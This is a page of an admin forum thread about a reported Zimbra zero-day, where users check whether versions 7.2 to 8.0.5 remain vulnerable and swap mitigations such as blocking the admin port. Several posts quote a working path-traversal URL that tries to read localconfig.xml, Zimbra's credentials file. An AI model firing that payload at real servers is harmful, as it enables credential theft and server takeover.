Page 2 of 4 FirstFirst 1234 LastLast
Results 11 to 20 of 38

Thread: zimbra 0-day

  1. #11
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,483
    Rep Power
    56

    Default

    Please see the following

    Security Guidance for reported "0day Exploit"

    I'll say this again, if anyone thinks that the current version of Zimbra is still vulnerable to this problem please file a bug report - that would be the correct place for this and get the attention of the Developers quicker that posting ad-hoc comments in the forums.
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  2. #12
    expert_az is offline Active Member
    Join Date
    Nov 2007
    Posts
    25
    Rep Power
    7

    Default

    phoenix I tried use zimbra bugzilla,it's not working for me.I could not enter bugzilla with old account(password resetted),then created new one and no sense.

    between 0day exploit reported:Bug#: 85249
    $zmcontrol -v
    Release 8.0.5_GA_5839.RHEL6_64_20130910123908 RHEL6_64 FOSS edition.

  3. #13
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,483
    Rep Power
    56

    Default

    Quote Originally Posted by expert_az View Post
    phoenix I tried use zimbra bugzilla,it's not working for me.I could not enter bugzilla with old account(password resetted),then created new one and no sense.
    It works fine for me, make sure you don't have anything blocking it in your browser (or clear the cache).
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  4. #14
    anndro is offline Starter Member
    Join Date
    Dec 2013
    Posts
    2
    Rep Power
    1

    Default

    I reported Bug#: 85249 but still UNCONFIRMED

  5. #15
    nrc
    nrc is online now Active Member
    Join Date
    Mar 2007
    Location
    Columbus, OH
    Posts
    25
    Rep Power
    8

    Default

    Quote Originally Posted by expert_az View Post
    I can confirm ,LFI working on last 8.0.5 and after 7.2.2

    LFI is located at :
    /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx %20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

    Zimbra - 0day exploit / Privilegie escalation via LFI
    When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability?

    It would be helpful at this point if Zimbra would open bug #80338 for review so that the community can understand the solution that was applied and assess whether what they're seeing now is expected behavior.

    Also, I note that the prescribed exploit for this bug expects access to the admin console port (7071). Eliminating that doesn't solve the underlying LFI problem but in general I think it's a bad idea to have your admin console publicly accessible on the Internet.

  6. #16
    liverpoolfcfan's Avatar
    liverpoolfcfan is offline Outstanding Member
    Join Date
    Oct 2009
    Location
    Dublin, IRELAND
    Posts
    710
    Rep Power
    6

    Default

    Quote Originally Posted by nrc View Post
    When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability?
    I can confirm that on 7.2.5 the url returns lots of settings but NOT anything from the localconfig.xml file.

  7. #17
    expert_az is offline Active Member
    Join Date
    Nov 2007
    Posts
    25
    Rep Power
    7

    Default

    Quote Originally Posted by nrc View Post
    When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability?

    It would be helpful at this point if Zimbra would open bug #80338 for review so that the community can understand the solution that was applied and assess whether what they're seeing now is expected behavior.

    Also, I note that the prescribed exploit for this bug expects access to the admin console port (7071). Eliminating that doesn't solve the underlying LFI problem but in general I think it's a bad idea to have your admin console publicly accessible on the Internet.
    nrc you are right, data comming back after hitting URL used by exploit is not localconfig.xml.But I'm getting long list of settings even on 8.0.5 ,is this normal?
    $zmcontrol -v
    Release 8.0.5_GA_5839.RHEL6_64_20130910123908 RHEL6_64 FOSS edition.

  8. #18
    JakeMS's Avatar
    JakeMS is offline Active Member
    Join Date
    Jul 2013
    Location
    /dev/urandom
    Posts
    33
    Rep Power
    1

    Default

    Hey guys.

    From a quick bit of testing the admin one is fixed.

    However hitting your ZCS 8.0.5 server with:
    https://mail.yourdomain.com/opt/zimb...ocalconfig.xml

    Doesn't appear to pull localconfig.xml however is instead pulling a language file of some sort?

    I would suggest to anyone at the moment until we know further details to do the following:

    1) Change from default port 80 to an alternate port, or if your IP does not change, restrict it to your own IP only.
    2) Block off 7071 from unknown IPs (You should of been doing this anyway)

    At least this way, worst case, they get an Admin login, but cannot actually access the admin control panel to do anything (Unless they root your server, but that's a whole other matter)

    Good luck guys!

  9. #19
    nrc
    nrc is online now Active Member
    Join Date
    Mar 2007
    Location
    Columbus, OH
    Posts
    25
    Rep Power
    8

    Default

    Quote Originally Posted by JakeMS View Post
    Hey guys.

    From a quick bit of testing the admin one is fixed.

    However hitting your ZCS 8.0.5 server with:
    https://mail.yourdomain.com/opt/zimb...ocalconfig.xml

    Doesn't appear to pull localconfig.xml however is instead pulling a language file of some sort?
    When I hit the URL you posted on my 8.0.3 system I get a 404 error, which is what I would expect. I really don't understand why anything in that namespace would respond.

    The original URL used in the exploit appears to be hitting an API call that is intended to return configuration settings. I can't find the documentation for that specific call but as long as it's only returning the intended information and not arbitrary files through an LFI then it should be harmless.

  10. #20
    JakeMS's Avatar
    JakeMS is offline Active Member
    Join Date
    Jul 2013
    Location
    /dev/urandom
    Posts
    33
    Rep Power
    1

    Default

    I've just checked my previous post.

    It would seem vBulletin scrapped most of the URL.

    Add:
    res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

    To the end instead. :-).

    If successful you will see:
    https://dl.dropboxusercontent.com/u/...pub/zm/odd.png

    But it appears to just be some language file, so it shouldn't cause and issues imo.

    Enjoy! :-D.

Page 2 of 4 FirstFirst 1234 LastLast

Thread Information

Users Browsing this Thread

There are currently 2 users browsing this thread. (0 members and 2 guests)

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •